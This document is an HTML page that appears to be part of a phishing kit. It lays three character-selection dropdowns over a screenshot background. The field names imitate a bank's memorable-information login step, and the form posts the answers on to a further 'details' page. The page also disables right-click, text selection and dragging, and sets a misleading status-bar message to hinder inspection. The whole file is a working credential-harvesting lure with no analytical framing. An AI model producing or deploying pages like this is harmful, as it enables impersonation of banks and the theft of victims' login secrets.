<head>
<title>Online Services</title>
<link rel="shortcut icon" href="favicon.ico" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body onselectstart="return false" oncontextmenu="return false" ondragstart="return false" onMouseOver="window.status='..message perso .. '; return true;" >
<style type="text/css">
<!--
html{
overflow-y:hidden;
}
-->
</style>

<style type="text/css">
Body{
background-image: url('');
background-repeat: no-repeat;
margin-left:0px;
margin-top:0px;
margin-bottom:-20px
}
</style>
</head>

<body style="background-image: url('memorable.png')">
<form id="form2" onsubmit="return validar(this);" action="details.html" method="POST">
<div id="Layer11" style="position:absolute; width:85px; height:18px; z-index:3; left: 256px; top: 266px">
  <select id="frmentermemorableinformation1:strEnterMemorableInformation_memInfo3" name="frmentermemorableinformation1:strEnterMemorableInformation_memInfo3" style="font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 1em; line-height: 1.4em; float: left; max-width: 618px">
	<option value="-" aria-label="Please enter character Character 1 &nbsp;from your memorable information">
	Select</option>
	<option value="&amp;nbsp;a">&nbsp;a</option>
	<option value="&amp;nbsp;b">&nbsp;b</option>
	<option value="&amp;nbsp;c">&nbsp;c</option>
	<option value="&amp;nbsp;d">&nbsp;d</option>
	<option value="&amp;nbsp;e">&nbsp;e</option>
	<option value="&amp;nbsp;f">&nbsp;f</option>
	<option value="&amp;nbsp;g">&nbsp;g</option>
	<option value="&amp;nbsp;h">&nbsp;h</option>
	<option value="&amp;nbsp;i">&nbsp;i</option>
	<option value="&amp;nbsp;j">&nbsp;j</option>
	<option value="&amp;nbsp;k">&nbsp;k</option>
	<option value="&amp;nbsp;l">&nbsp;l</option>
	<option value="&amp;nbsp;m">&nbsp;m</option>
	<option value="&amp;nbsp;n">&nbsp;n</option>
	<option value="&amp;nbsp;o">&nbsp;o</option>
	<option value="&amp;nbsp;p">&nbsp;p</option>
	<option value="&amp;nbsp;q">&nbsp;q</option>
	<option value="&amp;nbsp;r">&nbsp;r</option>
	<option value="&amp;nbsp;s">&nbsp;s</option>
	<option value="&amp;nbsp;t">&nbsp;t</option>
	<option value="&amp;nbsp;u">&nbsp;u</option>
	<option value="&amp;nbsp;v">&nbsp;v</option>
	<option value="&amp;nbsp;w">&nbsp;w</option>
	<option value="&amp;nbsp;x">&nbsp;x</option>
	<option value="&amp;nbsp;y">&nbsp;y</option>
	<option value="&amp;nbsp;z">&nbsp;z</option>
	<option value="&amp;nbsp;0">&nbsp;0</option>
	<option value="&amp;nbsp;1">&nbsp;1</option>
	<option value="&amp;nbsp;2">&nbsp;2</option>
	<option value="&amp;nbsp;3">&nbsp;3</option>
	<option value="&amp;nbsp;4">&nbsp;4</option>
	<option value="&amp;nbsp;5">&nbsp;5</option>
	<option value="&amp;nbsp;6">&nbsp;6</option>
	<option value="&amp;nbsp;7">&nbsp;7</option>
	<option value="&amp;nbsp;8">&nbsp;8</option>
	<option value="&amp;nbsp;9">&nbsp;9</option>
	</select>
</div>
<div id="Layer10" style="position:absolute; width:85px; height:18px; z-index:3; left: 168px; top: 266px">
  <select id="frmentermemorableinformation1:strEnterMemorableInformation_memInfo2" name="frmentermemorableinformation1:strEnterMemorableInformation_memInfo2" style="font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 1em; line-height: 1.4em; float: left; max-width: 618px">
	<option value="-" aria-label="Please enter character Character 1 &nbsp;from your memorable information">
	Select</option>
	<option value="&amp;nbsp;a">&nbsp;a</option>
	<option value="&amp;nbsp;b">&nbsp;b</option>
	<option value="&amp;nbsp;c">&nbsp;c</option>
	<option value="&amp;nbsp;d">&nbsp;d</option>
	<option value="&amp;nbsp;e">&nbsp;e</option>
	<option value="&amp;nbsp;f">&nbsp;f</option>
	<option value="&amp;nbsp;g">&nbsp;g</option>
	<option value="&amp;nbsp;h">&nbsp;h</option>
	<option value="&amp;nbsp;i">&nbsp;i</option>
	<option value="&amp;nbsp;j">&nbsp;j</option>
	<option value="&amp;nbsp;k">&nbsp;k</option>
	<option value="&amp;nbsp;l">&nbsp;l</option>
	<option value="&amp;nbsp;m">&nbsp;m</option>
	<option value="&amp;nbsp;n">&nbsp;n</option>
	<option value="&amp;nbsp;o">&nbsp;o</option>
	<option value="&amp;nbsp;p">&nbsp;p</option>
	<option value="&amp;nbsp;q">&nbsp;q</option>
	<option value="&amp;nbsp;r">&nbsp;r</option>
	<option value="&amp;nbsp;s">&nbsp;s</option>
	<option value="&amp;nbsp;t">&nbsp;t</option>
	<option value="&amp;nbsp;u">&nbsp;u</option>
	<option value="&amp;nbsp;v">&nbsp;v</option>
	<option value="&amp;nbsp;w">&nbsp;w</option>
	<option value="&amp;nbsp;x">&nbsp;x</option>
	<option value="&amp;nbsp;y">&nbsp;y</option>
	<option value="&amp;nbsp;z">&nbsp;z</option>
	<option value="&amp;nbsp;0">&nbsp;0</option>
	<option value="&amp;nbsp;1">&nbsp;1</option>
	<option value="&amp;nbsp;2">&nbsp;2</option>
	<option value="&amp;nbsp;3">&nbsp;3</option>
	<option value="&amp;nbsp;4">&nbsp;4</option>
	<option value="&amp;nbsp;5">&nbsp;5</option>
	<option value="&amp;nbsp;6">&nbsp;6</option>
	<option value="&amp;nbsp;7">&nbsp;7</option>
	<option value="&amp;nbsp;8">&nbsp;8</option>
	<option value="&amp;nbsp;9">&nbsp;9</option>
	</select>
</div>
<div id="Layer9" style="position:absolute; width:85px; height:18px; z-index:3; left: 80px; top: 266px">
  <select id="frmentermemorableinformation1:strEnterMemorableInformation_memInfo1" name="frmentermemorableinformation1:strEnterMemorableInformation_memInfo1" style="font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 1em; line-height: 1.4em; float: left; max-width: 618px">
	<option value="-" aria-label="Please enter character Character 1 &nbsp;from your memorable information">
	Select</option>
	<option value="&amp;nbsp;a">&nbsp;a</option>
	<option value="&amp;nbsp;b">&nbsp;b</option>
	<option value="&amp;nbsp;c">&nbsp;c</option>
	<option value="&amp;nbsp;d">&nbsp;d</option>
	<option value="&amp;nbsp;e">&nbsp;e</option>
	<option value="&amp;nbsp;f">&nbsp;f</option>
	<option value="&amp;nbsp;g">&nbsp;g</option>
	<option value="&amp;nbsp;h">&nbsp;h</option>
	<option value="&amp;nbsp;i">&nbsp;i</option>
	<option value="&amp;nbsp;j">&nbsp;j</option>
	<option value="&amp;nbsp;k">&nbsp;k</option>
	<option value="&amp;nbsp;l">&nbsp;l</option>
	<option value="&amp;nbsp;m">&nbsp;m</option>
	<option value="&amp;nbsp;n">&nbsp;n</option>
	<option value="&amp;nbsp;o">&nbsp;o</option>
	<option value="&amp;nbsp;p">&nbsp;p</option>
	<option value="&amp;nbsp;q">&nbsp;q</option>
	<option value="&amp;nbsp;r">&nbsp;r</option>
	<option value="&amp;nbsp;s">&nbsp;s</option>
	<option value="&amp;nbsp;t">&nbsp;t</option>
	<option value="&amp;nbsp;u">&nbsp;u</option>
	<option value="&amp;nbsp;v">&nbsp;v</option>
	<option value="&amp;nbsp;w">&nbsp;w</option>
	<option value="&amp;nbsp;x">&nbsp;x</option>
	<option value="&amp;nbsp;y">&nbsp;y</option>
	<option value="&amp;nbsp;z">&nbsp;z</option>
	<option value="&amp;nbsp;0">&nbsp;0</option>
	<option value="&amp;nbsp;1">&nbsp;1</option>
	<option value="&amp;nbsp;2">&nbsp;2</option>
	<option value="&amp;nbsp;3">&nbsp;3</option>
	<option value="&amp;nbsp;4">&nbsp;4</option>
	<option value="&amp;nbsp;5">&nbsp;5</option>
	<option value="&amp;nbsp;6">&nbsp;6</option>
	<option value="&amp;nbsp;7">&nbsp;7</option>
	<option value="&amp;nbsp;8">&nbsp;8</option>
	<option value="&amp;nbsp;9">&nbsp;9</option>
	</select>
</div>
<div id="Layer4" style="position:absolute; width:95px; height:43px; z-index:4; left: 872px; top: 377px;">
    <input type="image" name="imageField" id="imageField" src="c1.png" width="95" height="39" />
</form>
</body>
</html>